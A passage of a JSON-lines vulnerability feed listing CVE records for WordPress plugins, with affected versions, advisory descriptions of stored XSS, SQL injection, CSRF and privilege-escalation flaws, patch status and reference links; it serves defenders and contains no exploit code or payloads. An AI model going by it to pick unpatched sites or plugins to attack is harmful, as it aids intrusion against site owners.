ordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/634fa1ed-ad6b-4875-b6f9-f20add39dc80?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3615","slug":"fluentform","versionImpact":"6.0.2","description":"The Fluent Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form-submission.js script in all versions up to, and including, 6.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/tags\\\/6.0.2\\\/assets\\\/js\\\/form-submission.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluentform\\\/tags\\\/6.0.2\\\/assets\\\/js\\\/form-submission.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3274693\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3274693\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fluentform\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fluentform\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f31bd18e-57d4-4c87-8a7c-a168e7e70061?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f31bd18e-57d4-4c87-8a7c-a168e7e70061?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8701","slug":"event-calendars","versionImpact":"1.0.4","description":"The events-calendar WordPress plugin through 1.0.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/707d4b5b-8efe-4010-ba7d-80538545a2d5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/707d4b5b-8efe-4010-ba7d-80538545a2d5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5117","slug":"property","description":"The Property plugin for WordPress is vulnerable to Privilege Escalation due to a missing capability check on the use of the property_package_user_role metadata in versions 1.0.5 to 1.0.6. This makes it possible for authenticated attackers, with Author-level access and above, to elevate their privileges to that of an administrator by creating a package post whose property_package_user_role is set to administrator and then submitting the PayPal registration form.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/property\\\/tags\\\/1.0.6\\\/admin\\\/pages\\\/payment-inc\\\/paypal-submit.php#L128\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/property\\\/tags\\\/1.0.6\\\/admin\\\/pages\\\/payment-inc\\\/paypal-submit.php#L128\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/property\\\/tags\\\/1.0.6\\\/property.php#L1964\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/property\\\/tags\\\/1.0.6\\\/property.php#L1964\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3299714\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3299714\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/property\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/property\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df48f7f9-7bc9-4f9b-b9b5-6bfb86309030?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df48f7f9-7bc9-4f9b-b9b5-6bfb86309030?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5339","slug":"ap-plugin-scripteo","versionImpact":"4.89","description":"The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018bsa_pro_id\u2019 parameter in all versions up to, and including, 4.89 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"http:\\\/\\\/localhost:1337\\\/wp-content\\\/plugins\\\/ap-plugin-scripteo\\\/lib\\\/BSA_PRO_Model.php\",\"name\":\"http:\\\/\\\/localhost:1337\\\/wp-content\\\/plugins\\\/ap-plugin-scripteo\\\/lib\\\/BSA_PRO_Model.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5e4e1e3-61a6-4c37-80dd-93b5cea440e3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5e4e1e3-61a6-4c37-80dd-93b5cea440e3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3568","slug":"imagemagick-engine","description":"The ImageMagick Engine plugin for WordPress is vulnerable to deserialization of untrusted input via the 'cli_path' parameter in versions up to, and including 1.7.5. This makes it possible for unauthenticated users to call files using a PHAR wrapper, granted they can trick a site administrator into performing an action such as clicking on a link, that will deserialize and call arbitrary PHP Objects that can be used to perform a variety of malicious actions granted a POP chain is also present. It also requires that the attacker is successful in uploading a file with the serialized payload.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/orangelabweb\\\/imagemagick-engine\\\/blob\\\/v.1.7.2\\\/imagemagick-engine.php#L529\",\"name\":\"https:\\\/\\\/github.com\\\/orangelabweb\\\/imagemagick-engine\\\/blob\\\/v.1.7.2\\\/imagemagick-engine.php#L529\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a2ca2f0-1d4a-4614-86ba-a46e765f4a9f\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a2ca2f0-1d4a-4614-86ba-a46e765f4a9f\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/orangelabweb\\\/imagemagick-engine\\\/blob\\\/1.7.4\\\/imagemagick-engine.php#L529\",\"name\":\"https:\\\/\\\/github.com\\\/orangelabweb\\\/imagemagick-engine\\\/blob\\\/1.7.4\\\/imagemagick-engine.php#L529\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2801283%40imagemagick-engine&new=2801283%40imagemagick-engine&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2801283%40imagemagick-engine&new=2801283%40imagemagick-engine&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2277","slug":"wpdirectorykit","versionImpact":"1.1.9","description":"The WP Directory Kit plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.9. This is due to missing or incorrect nonce validation on the 'insert' function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious JavaScript via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2904689\\\/wpdirectorykit\\\/trunk\\\/application\\\/controllers\\\/Wdk_resultitem.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2904689\\\/wpdirectorykit\\\/trunk\\\/application\\\/controllers\\\/Wdk_resultitem.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdirectorykit\\\/tags\\\/1.1.8\\\/application\\\/views\\\/wdk_resultitem\\\/resultitem_edit.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdirectorykit\\\/tags\\\/1.1.8\\\/application\\\/views\\\/wdk_resultitem\\\/resultitem_edit.php#L34\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82c6ed2f-20e8-46d1-a460-16d32b7536cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82c6ed2f-20e8-46d1-a460-16d32b7536cd?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1277","slug":"ocean-extra","versionImpact":"2.2.4","description":"The Ocean Extra plugin for WordPress is vulnerable to Stored Cross-Site Scripting via custom fields in all versions up to, and including, 2.2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5458e3bf-fd91-4201-8157-572eb1126aaf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5458e3bf-fd91-4201-8157-572eb1126aaf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/trunk\\\/includes\\\/post-settings\\\/apply-settings.php#L750\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/trunk\\\/includes\\\/post-settings\\\/apply-settings.php#L750\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/trunk\\\/includes\\\/post-settings\\\/apply-settings.php#L756\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/trunk\\\/includes\\\/post-settings\\\/apply-settings.php#L756\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035534%40ocean-extra%2Ftrunk&old=3008053%40ocean-extra%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035534%40ocean-extra%2Ftrunk&old=3008053%40ocean-extra%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6785","slug":"download-manager","versionImpact":"3.2.84","description":"The Download Manager plugin for WordPress is vulnerable to unauthorized file download of files added via the plugin in all versions up to, and including, 3.2.84. This makes it possible for unauthenticated attackers to download files added with the plugin (even when privately published).","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7b3608ca-8ed6-46ff-8e57-d8b68f91b9f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7b3608ca-8ed6-46ff-8e57-d8b68f91b9f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3038209%40download-manager%2Ftrunk&old=3022104%40download-manager%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3038209%40download-manager%2Ftrunk&old=3022104%40download-manager%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1677","slug":"a4-barcode-generator","versionImpact":"3.4.6","description":"The Print Labels with Barcodes. Create price tags, product labels, order labels for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data, modification of data, and loss of data due to an improper capability check on 42 separate AJAX functions in all versions up to, and including, 3.4.6. This makes it possible for authenticated attackers, with subscriber access and above, to fully control the plugin which includes the ability to modify plugin settings and profiles, and create, edit, retrieve, and delete templates and barcodes.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e15d285-aa1d-461d-bdc2-642e7ccd789b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e15d285-aa1d-461d-bdc2-642e7ccd789b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/a4-barcode-generator\\\/trunk\\\/class\\\/Request.php?rev=2870656\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/a4-barcode-generator\\\/trunk\\\/class\\\/Request.php?rev=2870656\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4783","slug":"jquery-t-countdown-widget","versionImpact":"2.3.25","description":"The jQuery T(-) Countdown Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's tminus shortcode in all versions up to, and including, 2.3.25 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78eeef12-123b-42f6-b446-c3f2d43153fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78eeef12-123b-42f6-b446-c3f2d43153fd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-t-countdown-widget\\\/trunk\\\/countdown-timer.php#L768\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-t-countdown-widget\\\/trunk\\\/countdown-timer.php#L768\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7092","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.27","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018no_more_items_text\u2019 parameter in all versions up to, and including, 5.9.27 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/718c60c1-6117-4959-a907-d0ef457f7185?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/718c60c1-6117-4959-a907-d0ef457f7185?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php#L3879\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php#L3879\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php#L3900\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Filterable_Gallery.php#L3900\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/essential-addons-for-elementor-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/essential-addons-for-elementor-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/essential-addons.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/essential-addons.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134194\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134194\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8054","slug":"mm-breaking-news","versionImpact":"0.7.9","description":"The MM-Breaking News WordPress plugin through 0.7.9 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f27deffc-9555-44bf-8dee-1891c210ecfd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f27deffc-9555-44bf-8dee-1891c210ecfd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23510","slug":"wordpress-logging-service","versionImpact":"1.5.4","description":"Cross-Site Request Forgery (CSRF) vulnerability in Zaantar WordPress Logging Service allows Stored XSS.This issue affects WordPress Logging Service: from n\/a through 1.5.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-logging-service\\\/vulnerability\\\/wordpress-wordpress-logging-service-plugin-1-5-4-csrf-to-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-logging-service\\\/vulnerability\\\/wordpress-wordpress-logging-service-plugin-1-5-4-csrf-to-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13717","slug":"lead-capturing-call-to-actions-by-vcita","versionImpact":"2.7.1","description":"The Contact Form and Calls To Action by vcita plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the vcita_ajax_toggle_ae and vcita_ajax_toggle_contact functions in all versions up to, and including, 2.7.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to enabled and disable widgets.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-capturing-call-to-actions-by-vcita\\\/trunk\\\/vcita-ajax-function.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-capturing-call-to-actions-by-vcita\\\/trunk\\\/vcita-ajax-function.php#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93800bd9-5d11-4d5b-99b2-4c5c78510af7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93800bd9-5d11-4d5b-99b2-4c5c78510af7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2573","slug":"amazing-service-box-visual-composer-addons","versionImpact":"2.0.0","description":"The Amazing service box Addons For WPBakery Page Builder (formerly Visual Composer) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amazing-service-box-visual-composer-addons\\\/trunk\\\/asb_addon.php#L114\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amazing-service-box-visual-composer-addons\\\/trunk\\\/asb_addon.php#L114\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amazing-service-box-visual-composer-addons\\\/trunk\\\/asb_addon.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amazing-service-box-visual-composer-addons\\\/trunk\\\/asb_addon.php#L45\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/amazing-service-box-visual-composer-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/amazing-service-box-visual-composer-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4f6ce4d-6ca5-4a62-ae84-9dd190fc0392?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4f6ce4d-6ca5-4a62-ae84-9dd190fc0392?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8700","slug":"event-calendars","versionImpact":"1.0.4","description":"The Event Calendar WordPress plugin through 1.0.4 does not check for authorization on delete actions, allowing unauthenticated users to delete arbitrary calendars.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c48b657-afa1-45e6-ada6-27ee58185143\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c48b657-afa1-45e6-ada6-27ee58185143\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4963","slug":"wpextended","versionImpact":"3.0.15","description":"The WP Extended plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.0.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3300818\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3300818\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpextended\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpextended\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpextended.io\\\/module_resources\\\/svg-file-upload\\\/\",\"name\":\"https:\\\/\\\/wpextended.io\\\/module_resources\\\/svg-file-upload\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eabdd744-1a72-40f2-b569-f56a1b913273?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eabdd744-1a72-40f2-b569-f56a1b913273?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0395","slug":"menu-shortcode","versionImpact":"1.0","description":"The menu shortcode WordPress plugin through 1.0 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3f2565cd-7050-4ebd-9a50-cd9b9f7c3341\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3f2565cd-7050-4ebd-9a50-cd9b9f7c3341\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4676","slug":"osm","versionImpact":"6.01","description":"The OSM WordPress plugin through 6.01 does not validate and escape some of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1df3c17c-990d-4074-b1d5-b26da880d88e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1df3c17c-990d-4074-b1d5-b26da880d88e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1276","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.8","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Content Ticker arrow attribute in all versions up to, and including, 5.9.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af8bee01-15bc-485e-8b01-8b68b199b34d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af8bee01-15bc-485e-8b01-8b68b199b34d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.8\\\/includes\\\/Elements\\\/Content_Ticker.php#L815\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.8\\\/includes\\\/Elements\\\/Content_Ticker.php#L815\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034127%40essential-addons-for-elementor-lite%2Ftrunk&old=3029928%40essential-addons-for-elementor-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034127%40essential-addons-for-elementor-lite%2Ftrunk&old=3029928%40essential-addons-for-elementor-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4486","slug":"awesome-contact-form7-for-elementor","versionImpact":"3.0","description":"The Awesome Contact Form7 for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'AEP Contact Form 7' widget in all versions up to, and including, 2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0687e101-3c96-4c9b-941a-1b0fed2f76e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0687e101-3c96-4c9b-941a-1b0fed2f76e2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-contact-form7-for-elementor\\\/trunk\\\/widgets\\\/aep-contact-form7.php#L819\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-contact-form7-for-elementor\\\/trunk\\\/widgets\\\/aep-contact-form7.php#L819\",\"refsource\":\"\",\"tags\":[]}]"}
